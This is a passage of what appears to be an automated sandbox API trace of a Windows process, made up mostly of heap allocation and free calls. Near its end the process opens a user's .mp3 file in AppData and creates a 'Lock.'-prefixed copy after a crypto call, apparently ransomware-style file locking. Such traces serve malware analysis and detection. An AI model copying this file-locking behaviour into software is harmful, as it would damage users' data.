lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0207.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0207.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.552] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0207.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.553] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.553] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.556] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.556] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0207.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.557] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.557] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.557] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.557] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.557] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0207.558] CryptDestroyHash (hHash=0xaa5860) returned 1 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0207.558] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.558] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.559] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.559] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.559] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/_J3DS1U3FLV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_j3ds1u3flv.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0207.559] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.559] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0207.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0207.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0207.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.560] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.560] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.560] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0207.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0207.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.561] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0207.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0207.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0207.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock._J3DS1U3FLV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock._j3ds1u3flv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0207.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0207.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0207.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.563] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.563] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.564] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.564] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.565] HeapFree (in: 